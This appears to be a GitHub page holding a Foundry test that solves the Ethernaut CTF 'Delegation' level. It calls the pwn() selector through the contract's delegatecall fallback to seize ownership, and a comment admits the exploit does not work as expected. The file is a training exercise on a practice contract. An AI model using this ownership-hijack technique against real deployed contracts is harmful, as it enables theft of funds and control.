-
Notifications
You must be signed in to change notification settings - Fork 0
/
DelegationExploit.t.sol
38 lines (32 loc) · 1.1 KB
/
DelegationExploit.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.0;
import '../../src/EthernautCTF/Delegation.sol';
import '@forge-std/Test.sol';
import '@forge-std/console.sol';
contract DelegationExploit is Test {
Delegation target;
address deployer = makeAddr('deployer');
address exploiter = makeAddr('exploiter');
address delegate = makeAddr('delegate');
function setUp() public {
vm.startPrank(deployer);
target = new Delegation(delegate);
console.log('Target contract deployed');
vm.stopPrank();
}
function testExploit() public {
address owner = target.owner();
console.log('Current owner: %s', owner);
assertEq(owner, deployer);
vm.startPrank(exploiter);
// Call the `fallback` method using Delegate's `pwn` selector.
// TODO: Understand why the exploit does not work?!
// https://github.com/foundry-rs/foundry/issues/824
(bool success, ) = address(target).call(abi.encodeWithSignature('pwn()'));
require(success, 'Call failed');
vm.stopPrank();
owner = target.owner();
console.log('New owner: %s', owner);
assertEq(owner, exploiter);
}
}